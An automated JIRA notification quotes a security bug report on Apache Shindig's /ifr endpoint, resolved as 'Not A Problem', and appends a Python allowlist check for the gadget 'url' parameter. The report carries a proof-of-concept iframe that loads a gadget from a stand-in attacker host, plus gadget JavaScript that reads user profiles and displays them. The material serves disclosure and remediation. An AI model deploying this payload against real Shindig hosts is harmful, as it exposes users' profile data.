[ 
https://issues.apache.org/jira/browse/SHINDIG-1898?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Henry Saputra resolved SHINDIG-1898.
------------------------------------

    Resolution: Not A Problem
    
> XSS vulnerability through /ifr
> ------------------------------
>
>                 Key: SHINDIG-1898
>                 URL: https://issues.apache.org/jira/browse/SHINDIG-1898
>             Project: Shindig
>          Issue Type: Bug
>            Reporter: M. van Cuijk
>              Labels: security
>
> When a gadget contains JavaScript, it will be run in the domain context of 
> the Shindig application, since the gadget is loaded through /ifr on the 
> Shindig host. Therefore, gadgets are capable of doing HTTP requests to any 
> URI on this host.
> Loading a gadget through /ifr is controlled by the "url" query string 
> parameter, but no restrictions are placed on the value of this parameter. 
> Only the URL of gadgets that have previously been added to the container by 
> the user should be allowed for this parameter. Any other URL should result in 
> an error.
> The current situation allows an attacker to trick a user into opening a 
> website on any domain, including an iframe like this one:
> <iframe src="https://shindighost/gadgets/ifr?url=http%3A%2F%2Fattackerhost%2Fexploit.gadget.xml&amp;container=default&amp;view=canvas&amp;nocache=1"></iframe>
> Since the "url" parameter is not required to point to a gadget that has been 
> added by the user, any URL is accepted. Any JavaScript code that is contained 
> in the gadget is capable of doing HTTP requests to URIs under 
> https://shindighost/, e.g. with code like this:
> <Module>
>   <ModulePrefs title="Exploit" description="P0wned!" author="Mark van Cuijk" width="60" height="140">
>   </ModulePrefs>
>   <Content type="html" view="canvas">
>   <![CDATA[<!DOCTYPE html>
>     <script type="text/javascript" src="https://shindighost/webresources/js/lib/jquery.min.js"></script>
>     <script type="text/javascript">
>       $(function() {
>         $.ajax({
>           url: 'https://shindighost/rest/userprofiles',
>           success: function(d) {
>             var t = d.length + ' profiles found.\n'
>               + 'First profile: '
>               + d[0].openId;
>             window.alert(t);
>           }
>         });
>       });
>     </script>
>   ]]>
>   </Content>
> </Module>
> Now, when an authenticated user is pointed to the URL containing the iframe 
> above, the actual result is that a popup is displayed showing the total 
> number of user profiles in the application server and the OpenID identifier 
> of the first profile returned. The desired result is that no popup is 
> displayed, because the gadget and therefore the JavaScript is not loaded in 
> the iframe in the first place.
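
The restriction the report asks for, written out as an added example that is not Shindig's own code: the /ifr "url" parameter is accepted only when it names a gadget spec the user has already added, and everything else is refused. The registered gadget URLs below are constructed, and the check works on the raw query string rather than on Shindig's servlet API.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qs

# Constructed allowlist: gadget specs this user has already added to the container.
REGISTERED_GADGETS = {
    "http://gadgets.example.org/weather.xml",
    "https://apps.example.net:8443/calendar/gadget.xml",
}

DEFAULT_PORTS = {"http": 80, "https": 443}


def canonical_gadget_url(raw):
    """Normalise a gadget URL so trivially different spellings compare equal.

    Returns None for anything that is not a plain http(s) URL with a host.
    Userinfo ("allowed.host@attacker"), fragments and non-http schemes are
    refused outright instead of normalised; they are never valid gadget specs.
    """
    parts = urlsplit(raw.strip())
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    if parts.username or parts.password or parts.fragment:
        return None
    try:
        port = parts.port            # raises ValueError on a malformed port
    except ValueError:
        return None
    netloc = parts.hostname.lower()  # hostname is case-insensitive
    if port is not None and port != DEFAULT_PORTS[scheme]:
        netloc += ":%d" % port       # keep only non-default ports
    return urlunsplit((scheme, netloc, parts.path or "/", parts.query, ""))


def ifr_url_allowed(query_string, registered=REGISTERED_GADGETS):
    """Decide whether an /ifr request may render the gadget it names.

    Fails closed: a missing, blank, duplicated or unparseable "url" value
    is refused, and only an exact canonical match with a registered
    gadget is accepted.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    urls = params.get("url", [])
    if len(urls) != 1:
        return False
    canon = canonical_gadget_url(urls[0])
    if canon is None:
        return False
    allowed = {canonical_gadget_url(u) for u in registered}
    return canon in allowed
```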

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira